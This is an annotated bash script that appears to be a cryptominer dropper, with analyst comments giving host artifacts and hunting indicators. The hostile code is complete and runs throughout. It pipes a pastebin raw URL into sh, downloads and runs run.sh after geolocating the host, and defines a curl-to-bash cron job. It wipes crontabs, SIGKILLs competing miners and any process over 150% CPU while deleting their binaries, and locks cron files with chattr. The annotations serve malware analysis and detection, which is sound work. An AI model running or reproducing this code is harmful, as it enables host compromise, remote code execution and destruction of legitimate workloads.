1. #!/bin/bash
  2.  
  # Analyst note: opening statement run of what reads as a cryptominer dropper. The
  # comments added to this block describe the host artifacts each step leaves behind.
  # Clears the immutable (-i) and append-only (-a) attributes on the current user's and
  # the "apache" cron files so they can be modified; the final loop of this script sets
  # chattr +i/+a on the same paths again.
  3. for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1; do
  4. if [ -f "$file" ]; then
  5. chattr -i -a "$file"
  6. fi
  7. done
  # First positional argument, defaulting to "x"; handed to the downloaded run.sh later on.
  8. CUSTOM_ARG="${1:-x}"
  # Deletes the invoking user's entire crontab, legitimate jobs included. An unexpectedly
  # empty crontab is worth correlating with the other indicators in this script.
  9. crontab -r
  # Drops inbound traffic from two addresses and null-routes four (45.94.31.89 is in both
  # sets). The listing does not say whose they are; presumably competing infrastructure --
  # confirm before reusing them as IoCs. Hunt: `iptables -S INPUT` and
  # `ip route show type blackhole` for entries no administrator added.
  10. iptables -A INPUT -s 66.23.199.44 -j DROP
  11. iptables -A INPUT -s 45.94.31.89 -j DROP
  12. ip route add blackhole 139.59.59.33 || true
  13. ip route add blackhole 142.132.131.238 || true
  # NOTE(review): kill_and_remove_process is defined further down the script, so bash has
  # no such function at this point; `|| true` hides the failure status.
  14. kill_and_remove_process "kryptex.network" || true
  15. ip route add blackhole 45.94.31.89 || true
  # Recurring pattern below: delete a path, then create a DIRECTORY under the same name.
  # A directory at a file path blocks a later write of a regular file there; presumably
  # aimed at other tooling's drop locations (inferred, not stated). Directories named *.sh
  # under /tmp/runnv, and directories at /bin/softirq, /tmp/nuclear or
  # /usr/local/bin/watcher, are distinctive artifacts to look for during triage.
  16. rm -rf /bin/softirq || true
  17. rm -rf /lib/systemd/cache/health-monitor || true
  18. mkdir -p /bin/softirq || true
  19. rm -rf /tmp/nuclear || true
  20. mkdir -p /tmp/nuclear || true
  21.  
  22. ip route add blackhole 154.89.152.115 || true
  23. rm -rf /tmp/runnv/* || true
  24. mkdir -p /tmp/runnv/lived.sh || true
  25. mkdir -p /tmp/runnv/alive.sh || true
  26. mkdir -p /bin/softirq || true
  27. rm -rf /usr/local/bin/watcher || true
  28. mkdir -p /usr/local/bin/watcher || true
  # Remote stage: fetches https://pastebin.com/raw/2jtsz9Tk with wget, falling back to
  # curl -k (certificate verification off), strips carriage returns and pipes the result
  # to sh. It is detached with nohup and all output is discarded. Detection: a shell whose
  # command line contains a download tool piped into sh, and server egress to pastebin
  # raw URLs.
  29. nohup sh -c "{ wget -qO- https://pastebin.com/raw/2jtsz9Tk || curl -sSLk https://pastebin.com/raw/2jtsz9Tk; } | tr -d '\r' | sh" >/dev/null 2>&1 &
  30.  
  31.  
  32.  
  33.  
  34.  
  35.  
  # kill_and_remove_process TERM
  # Finds every process whose `ps` command line matches TERM, sends it SIGKILL and deletes
  # the executable it was started from, unless that executable resolves under /bin, /sbin,
  # /usr/bin or /usr/sbin.
  # Arguments: $1 - pattern handed to grep, so regex metacharacters such as "." apply.
  # Outputs:   progress messages on stdout.
  # Returns:   2 if TERM is empty, 1 if nothing matched, 0 otherwise.
  # Defender impact: the path check does not cover /usr/local, /opt, /home or /tmp, so
  # software installed there whose command line merely contains TERM is killed and its
  # binary removed. Unexplained SIGKILLs together with missing executables are the trace
  # this function leaves.
  36. kill_and_remove_process() {
  37. local term="$1"
  38. if [ -z "$term" ]; then
  39. echo "term not provided."
  40. return 2
  41. fi
  42.  
  43. local pids
  # Matches against the full argument list, not only the program name.
  44. pids=$(ps -eo pid,args | grep "$term" | grep -v grep | awk '{print $1}')
  45.  
  46. if [ -z "$pids" ]; then
  47. return 1
  48. fi
  49.  
  50. for pid in $pids; do
  51. local exe_path
  # Resolve the on-disk binary through /proc; the result is empty when the link cannot be read.
  52. exe_path=$(readlink -f "/proc/$pid/exe" 2>/dev/null)
  53.  
  54. if [ -z "$exe_path" ]; then
  55. echo "Skipping PID $pid"
  56. continue
  57. fi
  58.  
  59. # SAFETY CHECK: Exclude common system binary paths
  60. case "$exe_path" in
  61. /bin/*|/sbin/*|/usr/bin/*|/usr/sbin/*)
  62. echo "Skipping system binary for PID $pid at: $exe_path"
  63. continue # Move to the next PID
  64. ;;
  65. esac
  66.  
  67. # If the checks pass, proceed with termination and deletion
  68. echo "Terminating non-system process '$term' with PID: $pid"
  69. kill -9 "$pid"
  70.  
  71. if [ -f "$exe_path" ]; then
  72. echo "Deleting executable: $exe_path"
  73. rm -f "$exe_path"
  74. if [ $? -eq 0 ]; then
  75. echo "Executable successfully deleted."
  76. else
  77. echo "Error: Failed to delete executable. Check permissions."
  78. fi
  79. else
  80. echo "Executable for PID $pid not found for deletion (already removed or inaccessible)."
  81. fi
  82. done
  83.  
  84. return 0
  85. }
  86.  
  # Terms searched for in other processes' command lines. Several name mining software or
  # pools (xmrig, monero, supportxmr, c3pool.org:80), which suggests removal of competing
  # miners -- inferred from the strings alone. The list doubles as hunting keywords, and
  # 45.94.31.89 is also firewalled and null-routed earlier in the script.
  87. kill_and_remove_process ".rsyslogd" || true
  88. kill_and_remove_process "crazyeltonproxy" || true
  89. kill_and_remove_process "xmrig" || true
  90. kill_and_remove_process "monero" || true
  91. kill_and_remove_process "c3pool.org:80" || true
  92. kill_and_remove_process "/bin/watcher" || true
  93. kill_and_remove_process "45.94.31.89" || true
  94. kill_and_remove_process "hosts-to-ignore" || true
  95. kill_and_remove_process "supportxmr" || true
  96. kill_and_remove_process "youyutebuae.xyz" || true
  97. kill_and_remove_process "nuclear" || true
  98.  
  99.  
  100.  
  101.  
  102.  
  103.  
  # SIGKILLs every process whose command line matches `bash /tmp/<anything>.sh`, sparing
  # this shell ($$) and its parent ($PPID). Legitimate maintenance scripts run from /tmp
  # are hit too.
  104. for pid in $(pgrep -f 'bash /tmp/.*\.sh'); do
  105. if [ "$pid" != "$$" ] && [ "$pid" != "$PPID" ]; then
  106. kill -9 "$pid" 2>/dev/null && echo "Killed process $pid"
  107. fi
  108. done
  109.  
  110.  
  111.  
  # When running as root, stops a unit called systemd_s. The listing does not define that
  # unit; presumably it belongs to other tooling on the host -- confirm with
  # `systemctl cat systemd_s` before drawing conclusions.
  112. if [ "$(id -u)" -eq 0 ]; then
  113. echo "Stopping systemd_s service..."
  114. systemctl stop systemd_s
  115. fi
  116.  
  # check_system_specs
  # Prints "VERY GOOD BOY!" when the host has more than 8 CPUs and the script runs as root
  # (EUID 0); it has no other effect. The CPU count comes from nproc, then a count of
  # "processor" lines in /proc/cpuinfo, then a default of 1.
  # The literal output string is a usable indicator in captured stdout or shell logs.
  117. check_system_specs() {
  118. local cpu_count=$(nproc 2>/dev/null || grep -c '^processor' /proc/cpuinfo 2>/dev/null || echo 1)
  119. local is_root=false
  120. if [[ $EUID -eq 0 ]]; then
  121. is_root=true
  122. fi
  123.  
  124. if [[ $cpu_count -gt 8 && "$is_root" == "true" ]]; then
  125. echo "VERY GOOD BOY!"
  126. fi
  127. }
  128.  
  # Runs the host-size check; its only visible result is the optional message on stdout.
  129. # Call the function
  130. check_system_specs
  131.  
  # kill_high_cpu_processes
  # SIGKILLs every process that `ps` reports above 150.0 %CPU, except those whose
  # /proc/<pid>/cmdline contains "reservepattern23333" or "goAwgBCFH".
  # "goAwgBCFH" is the same marker is_program_running searches for, so it presumably tags
  # the payload this script protects (inferred from the shared string).
  # Outputs: one status line per PID on stdout.
  # Defender impact: nothing here distinguishes a miner from a database, build or batch
  # job; any busy multi-threaded workload is terminated. A burst of SIGKILLs against the
  # top CPU consumers, with the marked process left running, is the pattern to look for.
  132. kill_high_cpu_processes() {
  133. local threshold=150.0
  134. local exclude_patterns=("reservepattern23333" "goAwgBCFH")
  135. local pid cpu cmdline
  136.  
  137. ps -eo pid,%cpu --sort=-%cpu | awk -v threshold="$threshold" \
  138. 'NR>1 && $2 > threshold {print $1}' | while read -r pid; do
  139.  
  140. # Read full command line (even if truncated in `ps`)
  141. if [ -f "/proc/$pid/cmdline" ]; then
  142. cmdline=$(tr '\0' ' ' < "/proc/$pid/cmdline")
  143. else
  144. echo "PID $pid died before inspection"
  145. continue
  146. fi
  147.  
  148. # Check for exclusion patterns in full cmdline
  149. for pattern in "${exclude_patterns[@]}"; do
  150. if [[ "$cmdline" == *"$pattern"* ]]; then
  151. echo "Excluding PID $pid (matched '$pattern')"
  152. continue 2
  153. fi
  154. done
  155.  
  # The %CPU lookup in the success message runs after the kill has been sent.
  156. if kill -9 "$pid" 2>/dev/null; then
  157. echo "Killed PID $pid (CPU: $(ps -p "$pid" -o %cpu --no-headers)%)"
  158. else
  159. echo "Failed to kill PID $pid (already dead or permission denied)"
  160. fi
  161. done
  162. }
  163.  
  # Runs the CPU-threshold sweep once, before the script decides whether to fetch its payload.
  164. kill_high_cpu_processes
  165.  
  # is_program_running
  # Walks /proc/<pid>/cmdline looking for the marker string "goAwgBCFH" and reports
  # whether a matching, non-zombie process exists (third field of /proc/<pid>/stat is not "Z").
  # Command lines that also contain "is_program_running" are ignored.
  # Outputs: "Program is running." or "Program is not running." on stdout.
  # Returns: 0 when a match is found, 1 otherwise.
  # found, pid, cmdline and state are assigned without `local`, so they are globals.
  # Hunting: searching process command lines for "goAwgBCFH" finds the same process.
  166. is_program_running() {
  167. found=0
  168. for proc_dir in /proc/[0-9]*; do
  169. if [ -d "$proc_dir" ]; then
  170. pid=$(basename "$proc_dir")
  171.  
  172. if [ -r "$proc_dir/cmdline" ]; then
  173. cmdline=$(cat "$proc_dir/cmdline" 2>/dev/null | tr '\0' ' ')
  174.  
  175. if echo "$cmdline" | grep -q "goAwgBCFH" && \
  176. ! echo "$cmdline" | grep -q "is_program_running"; then
  177.  
  178. if [ -r "$proc_dir/stat" ]; then
  179. state=$(awk '{print $3}' "$proc_dir/stat" 2>/dev/null)
  180. if [ "$state" != "Z" ]; then
  181. found=1
  182. break
  183. fi
  184. fi
  185. fi
  186. fi
  187. fi
  188. done
  189.  
  190. if [ $found -eq 1 ]; then
  191. echo "Program is running."
  192. return 0
  193. else
  194. echo "Program is not running."
  195. return 1
  196. fi
  197. }
  198.  
  199.  
  200.  
  201.  
  202.  
  203.  
  # download_and_execute
  # Geolocates the host, picks one of two URLs, saves the response as run.sh in the current
  # directory, runs it with bash and deletes it.
  # Globals: primary_url, china_url (read), CUSTOM_ARG (read, passed to run.sh).
  # NOTE(review): primary_url and china_url are not assigned anywhere in this listing.
  # Exits the whole script with status 1 when no download tool exists or no file was written.
  # Detection: a plain-HTTP request to ip-api.com/json/ from a server, a short-lived run.sh
  # in the working directory, and a `bash ./run.sh <arg>` process. curl is invoked with -k,
  # so certificate verification is off for the download.
  204. download_and_execute() {
  205. local output_file="run.sh"
  206.  
  # Country lookup over unencrypted HTTP; only the literal "country":"China" is tested.
  207. local is_in_china=false
  208. if command -v curl &> /dev/null; then
  209. if curl -s --connect-timeout 3 -4 http://ip-api.com/json/ | grep -q '"country":"China"'; then
  210. is_in_china=true
  211. fi
  212. elif command -v wget &> /dev/null; then
  213. if wget -qO- --timeout=3 -4 http://ip-api.com/json/ | grep -q '"country":"China"'; then
  214. is_in_china=true
  215. fi
  216. fi
  217.  
  218. # Select appropriate URL
  219. local download_url="$primary_url"
  220. if [ "$is_in_china" = true ]; then
  221. download_url="$china_url"
  222. fi
  223.  
  224. # Download the script
  225. if command -v wget &> /dev/null; then
  226. wget -qO "$output_file" "$download_url"
  227. elif command -v curl &> /dev/null; then
  228. curl -k -o "$output_file" "$download_url"
  229. else
  230. echo "Error: Neither wget nor curl is available. Please install one of them."
  231. exit 1
  232. fi
  233.  
  234. # Execute if download succeeded
  # Only the file's existence is tested here; its content is not checked before it runs.
  # The file is removed afterwards, so disk forensics may find no run.sh.
  235. if [[ -f "$output_file" ]]; then
  236. chmod +x "$output_file"
  237. sed -i 's/\r$//' "$output_file"
  238. bash ./"$output_file" "$CUSTOM_ARG"
  239. rm -f "$output_file"
  240. else
  241. echo "Error: Failed to download the script from $download_url"
  242. exit 1
  243. fi
  244. }
  245.  
  # get_cpu_count
  # Prints the CPU count on stdout: the number of "processor" lines in /proc/cpuinfo when
  # that file exists, otherwise the first of sysctl hw.ncpu, nproc or getconf
  # _NPROCESSORS_ONLN that succeeds, falling back to 1.
  246. get_cpu_count() {
  247. # Try different methods to get CPU count
  248. if [ -f "/proc/cpuinfo" ]; then
  249. grep -c ^processor /proc/cpuinfo
  250. else
  251. sysctl -n hw.ncpu 2>/dev/null || nproc 2>/dev/null || getconf _NPROCESSORS_ONLN 2>/dev/null || echo 1
  252. fi
  253. }
  254.  
  # is_ec2_host
  # Returns 0 when the hostname contains "ec2" or "compute" (case-insensitive), else grep's
  # non-zero status. The check is a hostname substring match only, so it also fires on any
  # machine that merely has one of those words in its name.
  255. is_ec2_host() {
  256. # Check if hostname contains "ec2" (case insensitive)
  257. hostname | grep -qi -e "ec2" -e "compute"
  258. return $?
  259. }
  260.  
  # Gate for the payload fetch: it runs only when no process carrying the marker is alive
  # and the host has more than 3 CPUs or a cloud-looking hostname. Small hosts print the
  # "LOW CPU" line instead, which is itself a string to search for in captured output.
  261. # Main logic
  262. if ! is_program_running; then
  263. cpu_count=$(get_cpu_count)
  264. if [ "$cpu_count" -gt 3 ] || is_ec2_host; then
  265. download_and_execute
  266. else
  267. echo "LOW CPU: System has only $cpu_count CPUs (minimum 4 required) and is not an EC2 instance"
  268. fi
  269. fi
  # create_cronjob URL
  # Builds a crontab entry that downloads URL with curl (-k, certificate verification off)
  # or wget and pipes it to bash, then rewrites the user's crontab: existing lines
  # containing URL are filtered out and the new entry is appended.
  # Arguments: $1 - URL placed verbatim into the cron command.
  # Returns:   1 when neither curl nor wget is present.
  # NOTE(review): nothing in this listing calls create_cronjob or defines `log`.
  # Hunting: crontab lines with the schedule `*/75 * * * *`, or with a download tool piped
  # into bash through `tr -d '\r'`.
  270. create_cronjob() {
  271. local cron_command
  272. if command -v curl >/dev/null; then
  273. cron_command="/bin/sh -c 'curl -fsSLk $1 | tr -d '\''\r'\'' | bash'"
  274. elif command -v wget >/dev/null; then
  275. cron_command="/bin/sh -c 'wget -qO- $1 | tr -d '\''\r'\'' | bash'"
  276. else
  277. log "Error: Cannot create cron job, neither curl nor wget is available."
  278. return 1
  279. fi
  280.  
  281. (crontab -l 2>/dev/null | grep -vF "$1"; echo "*/75 * * * * $cron_command") | crontab -
  282. log "Cron job successfully configured."
  283. }
  284.  
  285.  
  # Sets the immutable (+i) and append-only (+a) attributes on the cron files unlocked at
  # the top of the script, plus /etc/init.d/down. With these set, ordinary edits and
  # deletes fail even for root. Responders: list attributes with `lsattr` on these paths
  # and clear them with `chattr -i -a` before removing the files.
  286. for file in /etc/cron.d/$(whoami) /etc/cron.d/apache /var/spool/cron/$(whoami) /var/spool/cron/crontabs/$(whoami) /etc/cron.hourly/oanacroner1 /etc/init.d/down; do
  287. if [ -f "$file" ]; then
  288. chattr +i "$file"
  289. chattr +a "$file"
  290. fi
  291. done